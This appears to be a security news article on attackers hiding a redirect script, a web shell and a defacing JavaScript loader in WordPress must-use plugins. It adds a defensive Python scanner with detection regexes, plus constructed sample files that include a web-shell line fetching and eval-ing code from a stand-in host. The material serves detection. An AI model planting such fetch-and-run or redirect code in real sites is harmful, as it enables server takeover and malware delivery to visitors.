
The technique was first discovered in February 2025, but its use continues to grow, and attackers currently abuse MU plugins to run three different types of malicious code.
Must-Use Plugins are a special type of WordPress plugin that runs on every page load and does not require activation in the Admin Panel. These PHP files are stored in the wp-content/ directory, are executed automatically, and do not appear on the Plugins page of the Admin Panel unless the Must-Use filter is selected.
Such plugins are used, among other things, to enforce custom security rules across the site, boost performance, or dynamically modify variables.
Since MU plugins are executed on every page load and do not appear in the standard plugin list, they can be used to covertly perform a wide range of malicious operations (e.g. steal credentials, inject malicious code, or modify HTML output).
Sucuri experts discovered three different payloads placed by cybercriminals in the MU-plugins directory:
- redirect.php redirects visitors (excluding bots and logged-in admins) to the malicious website updatesnow[.]net, which displays a fake browser update prompt to trick the victim into downloading malware;
- index.php is a web shell that acts as a backdoor by downloading and executing PHP code from a GitHub repository; and
- custom-js-loader.php loads JavaScript that replaces all images on the website with explicit content, hijacks all external links, and opens fraudulent pop-ups instead.

The most dangerous payload is the web shell, since it enables attackers to remotely execute commands on the server, steal data, and launch further attacks on the site's users and visitors.
The other two malware samples are more likely to damage the website's reputation and its SEO rankings through suspicious redirects and attempts to install malware on visitors' computers.
The infection vector used by the attackers is not yet known. It is assumed that they exploit known vulnerabilities in WordPress plugins and themes or weak admin credentials.
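As an added defender-side example (not from the article or from Sucuri), the following Python script inventories the PHP files in wp-content/mu-plugins, hashes each one, and flags the code patterns behind the redirect and web-shell payloads described above (a Location redirect, and a remote code fetch passed to eval) plus common obfuscation calls. The heuristics and the constructed sample files are assumptions for illustration; a hit is a prompt for manual review, not proof of compromise.

```python
import hashlib
import os
import re
import tempfile

# Assumed review heuristics, chosen to match the payload types above; tune per site.
SUSPICIOUS = {
    "remote_code_fetch": re.compile(r"file_get_contents\s*\(\s*['\"]https?://", re.I),
    "dynamic_eval": re.compile(r"\b(eval|create_function)\s*\(", re.I),
    "obfuscation": re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "redirect": re.compile(r"header\s*\(\s*['\"]Location:", re.I),
}

def scan_mu_plugins(wp_content):
    """One record per PHP file in <wp_content>/mu-plugins: name, sha256, matched heuristics."""
    mu_dir = os.path.join(wp_content, "mu-plugins")
    findings = []
    if not os.path.isdir(mu_dir):
        return findings  # nothing to review, or the path is wrong
    for name in sorted(os.listdir(mu_dir)):
        path = os.path.join(mu_dir, name)
        if not (name.endswith(".php") and os.path.isfile(path)):
            continue
        with open(path, "rb") as fh:
            data = fh.read()
        text = data.decode("utf-8", "replace")
        hits = [k for k, rx in SUSPICIOUS.items() if rx.search(text)]
        findings.append({"file": name, "sha256": hashlib.sha256(data).hexdigest(),
                         "hits": hits})
    return findings

# Constructed sample files (not real malware): one benign tweak and two look-alikes.
SAMPLES = {
    "cache-tweaks.php": "<?php\nadd_filter('wp_headers', function ($h) {\n"
                        "    $h['X-Frame-Options'] = 'SAMEORIGIN'; return $h;\n});\n",
    "index.php": "<?php\n// fetches and runs remote code: the web-shell pattern\n"
                 "eval(file_get_contents('https://example.invalid/p.txt'));\n",
    "redirect.php": "<?php\nif (!is_user_logged_in()) {\n"
                    "    header('Location: https://example.invalid/update');\n    exit;\n}\n",
}

def scan_constructed_samples():
    """Write SAMPLES into a temporary wp-content tree and scan it."""
    with tempfile.TemporaryDirectory() as wp_content:
        mu_dir = os.path.join(wp_content, "mu-plugins")
        os.mkdir(mu_dir)
        for name, body in SAMPLES.items():
            with open(os.path.join(mu_dir, name), "w") as fh:
                fh.write(body)
        return scan_mu_plugins(wp_content)
```

On a live site, call scan_mu_plugins on the real wp-content path and compare the SHA-256 values against a known-good inventory taken when the site was clean.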
